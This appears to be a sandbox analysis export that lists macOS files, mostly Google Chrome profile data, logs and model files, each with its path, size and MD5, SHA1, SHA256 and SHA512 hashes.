a4128fb20a5df9e573e92b45f5bc18dcdf4be6e7e39172d08847882f17361320141e89b35deef337e40c365d6f1ccdd1b991eb4593d805dfa2e39a5257c335ee

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/.com.google.Chrome.v4Men0/efniojlnjndmcbiieegkicadnoecjjef_975_all_gbfm3z5xnhiwzkug3wnwxeesvy.crx3
Filesize
150KB

MD5
2c145ff41e457b1e3181faeed6ef2542

SHA1
5f15d83e676e856cca536b8a6e3a5218b9feb9d4

SHA256
9d9e344f2ec01a105724988c1eeaca6521d2136dc519e481dca8ca54598f88cc

SHA512
06cf7ec3195a0b8772a3bd3e54b34792479627c34cdb26cb46d40aadaf7ceb27cc8381bc64a270130ab0ccda0ec98fe937a70d03ead79bdcd5b3d61a661431ab

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T//spindump.txt
Filesize
25KB

MD5
ba5803285b6a4f2eaf9b923ab01cf39e

SHA1
a223f45b14f6370479c4bde30617a4b38a9f26a7

SHA256
cd19f6f077d533ec2147f67b480841fe44d5c327ac0e7b4afd2623bc759a90f1

SHA512
20a95c6a47783a07172a79e478f9f09dca89a6d459d3fa6bae6128ab2bcb2d925dcdc79610abdbf4f5ad2628b10e2a642bfaed23bc3b12f5dbbde579b0413378

Download Submit
/var/log/fsck_hfs.log
Filesize
15KB

MD5
f67c78a7f3e7cb81045be82c6fd05a86

SHA1
9de01642e9b7b0a1207719a2b07f774bd0ad4474

SHA256
3db7a8dbb08be41afc21a51d1ed0562a63643a0d8d789ba296b5c3f28bd022c7

SHA512
55405c06e7c0d6cbb5a0451caae5720a2508d59036baf93f303d49e8e50a56492d1b81ac5e499ff097f63647dedbc61fcddf76c0f89439a1258a2d89662eb53c

Download Submit
/var/root/Library/Application Support/Google/Chrome/ClientSidePhishing/29.0/visual_model.tflite
Filesize
3.0MB

MD5
a9803d560544e4d1fe551b2c113c5370

SHA1
a998fdb1e80dbca61267db112812a7ee34b82dce

SHA256
d38a4cda8912f9598b8701dac7d5ee90eff324ed1fb9d277b9784fe45a4e6c72

SHA512
65b8b6ecfea2aeae95a39581c39476a54721e07ee7c296650ccddea29a09b29a11cab15fdc89f97295bd61423dc13a66666faca371200bcb459dc1f25b6c89fd

Download Submit
/var/root/Library/Application Support/Google/Chrome/Crashpad/settings.dat
Filesize
40B

MD5
c6db1caaee0095f017c09113d53ed054

SHA1
cc37e2b3948325a0eeb51080f45b17ebf52a7035

SHA256
ca3252b297284a87de2ee1688585f7c37d26b98c05d7ed04bd7d6df10c0d1476

SHA512
3013340ee4157dfef7dcacd690b840f12b876e8241d4e8bc419016d5336810ab77023cdbbeaa896544e4c29f386d21296649542ef2b0fc6b58c49e2ad0337d85

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/Download Service/Files/303da55d-639d-4ecd-9edf-4141b94978c0
Filesize
258KB

MD5
5adf364735dcbe6bf26ebe3f705c9dbc

SHA1
a891521fea2f61a2fd16ea9f0a3fc3c2c5fb3a46

SHA256
8d21fe1bd251856bfaeaedd6a72ab78f153a047b6042e0fc614f57a32b56d340

SHA512
5f77f8923ab3800ab754f4c60095077b529c5f5f230c6a0b6803dc28597f42ed682921267ed344e190d0f08e0a23eceace7bccbc9d22432029a3e6f4838420e0

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/Download Service/Files/Unconfirmed 232302.crdownload
Filesize
60KB

MD5
a45872e3182e395f805c7424ed21e5ec

SHA1
a71f7f4488ce6d363b67913d24e5aecf3f7125c0

SHA256
6139f08d6fbc4e607a4a7caf68711ee9fa9c6c66d955463953b9320e2e84af08

SHA512
c7f7c0bc4b2497804aad733c86df240c7e25f0713598c9d790bcd5f0a7f1912b3bf2c760317096a7040fd59722d0c6c80deb44cac7c49f57bfe11f83f0c3bc48

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/Extension Scripts/CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/Extension Scripts/MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/Session Storage/000003.ldb
Filesize
141B

MD5
38fc535a8f11d7e955ef58cc63158eff

SHA1
c45ad3ee106dbfb65dce7c09b53140f34454cd0e

SHA256
085c44dfa11e65ac3548c4d0fe1ae641570f90c7caaa2881c3990efcf555e6a8

SHA512
26e70000f77c1b6388dd470f9d7ec6bedc4fc3c43e48efcc853812eb076108bcdd9f50f7a89265e431d33df96e71755ca242dfd0aac16a51d99dea50a5a1e505

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/Site Characteristics Database/000003.ldb
Filesize
312B

MD5
5c4e7ade5753ab7de2c42c04111fa42e

SHA1
fb577b8c07d9617f507a3f2950df0a6dcfebe4e2

SHA256
d3979fd2d9ecfdb05498d79d1f24998c38cfd107e321f6810d8b7f9f12affd82

SHA512
7a7452bcd22e66190e36ff0036f21d854fa57bdcbaebf637aa3a6d932a385a7c90525ede0c124853c218445d583c0edcf45d12159ca452732f31d16c3901929b

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/Sync Data/LevelDB/000003.ldb
Filesize
136B

MD5
fe382e791274914bee5950777e4f1fd3

SHA1
53b523b5fc87e66f2520a0b5f9ea080072668f4d

SHA256
935d36c021d0e08a5648c622f3f6fde376e3310013680ae598c0e22dc943d132

SHA512
a5f608fb4f0a1dbc4c5d1b739b1a5b6f50cac1d6a61312b19abf9f601882a291d73524ac55bbe183e4e64db8dcc203d4bf3cedc734fd04bd448cb825d98d1e67

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/shared_proto_db/000003.ldb
Filesize
337B

MD5
ea517aa120c972c602673d331dfa35bc

SHA1
7ff539eec544cf306b80137bc182fb544e58aad5

SHA256
0c53b2ef8ec9bd6c3b81955b45cd9fc69705e7b435ad747b50c150c7e341f8da

SHA512
e2bc6f26b0db61af3b7f1648e890be2b748aa886ff3ab51e207a915432c6d9a426b188fe9c979b443e8fe8aad248442b20b2e6cd38f494264cb7cdbcaa88eecd

Download Submit
/var/root/Library/Application Support/Google/Chrome/Default/shared_proto_db/metadata/000003.ldb
Filesize
353B

MD5
17a2dc5826aeb539547f00f52eccccd5

SHA1
fd36ad6db84312792cffac0267f6329b21727d66

SHA256
746da9cf33c3e4d29907dfdf1065f06ae16dcb5c2e9a34cfb5dd0dae9130f151

SHA512
6bca3e308d0446211570021c1f1dc6d8e9704a2a68a90c5c8daf26b20cb2702bccfae8ddfeb6f16c8bfea83e1b648810054a25a7967bb9539feb241f2950ea73

Download Submit
/var/root/Library/Application Support/Google/Chrome/OptimizationGuidePredictionModels/9e8e4fff-060d-48c3-ac70-e30ac6dc94a4/model.tflite
Filesize
382KB

MD5
6d7c2f9e94664539dec99b3233301b01

SHA1
85812b004742cc1c211c92911131ce270f8ba769

SHA256
a0956386dc64fd9f4883c8741f950cd60a56859616b159c9e4251c9eb0ac5534

SHA512
4d06917f30651c3bf13c509aae79793b3f1ec93de12179464b18fd9fd16c7bf466884b1c70e425d7e937adde341cf24bd08f19a132bbb9683e804f29b4ed0c33

Download Submit
/var/root/Library/Application Support/Google/Chrome/Subresource Filter/Indexed Rules/35/9.49.1/Ruleset Data
Filesize
120KB

MD5
c5e30274fe7b93847f6d7c02410d1209

SHA1
488a49f38459f29e110c706c51b61ca1ae3b0e26

SHA256
e634e3cfdd0d27d0be1f5f9a19748d19d564928765db343503f42a6e1f5dd4ea

SHA512
bc235bb3af269e9a828e6788dbae2b42cabc879b858102f4cc76c0fa02af0e296d20ffc8f134c0a3f9b408643e4810e8c46afeb0c285b892908b06ea1aa1b811

Download Submit
/var/root/Library/Application Support/Google/Chrome/Subresource Filter/Unindexed Rules/9.49.1/Filtering Rules
Filesize
68KB

MD5
6274a7426421914c19502cbe0fe28ca0

SHA1
e4d1c702ca1b5497a3abcdd9495a5d0758f19ffc

SHA256
ae2fd01d2908591e0f39343a5b4a78baa8e7d6cac9d78ba79c502fe0a15ce3ee

SHA512
bf1287f502013308cdd906f6e42998c422ef1e272b348e66122dc4a4e471d01333b418f48d1bb2198c72845bdc950612597e179e612aaa1ba6cf8d48fb8f0cf5

Download Submit
/var/root/Library/Saved Application State/com.google.Chrome.savedState/data.data
Filesize
3KB

MD5
4f42a84f0674551bc9cacc27e3d08719

SHA1
47f145c77c636a4f37e57458be13b56675389acb

SHA256
fcd0cf33b008848aeac1e83fa68d5ed12b80ebf6e302312c018039c240782661

SHA512
6e82d5083756517323df68ae6f274e01f59730c53c3837559c61541c8419732d904c013a959ac29c0d8d895432bebaa118a72934a99646e2f10bdeda3e85031f

Download Submit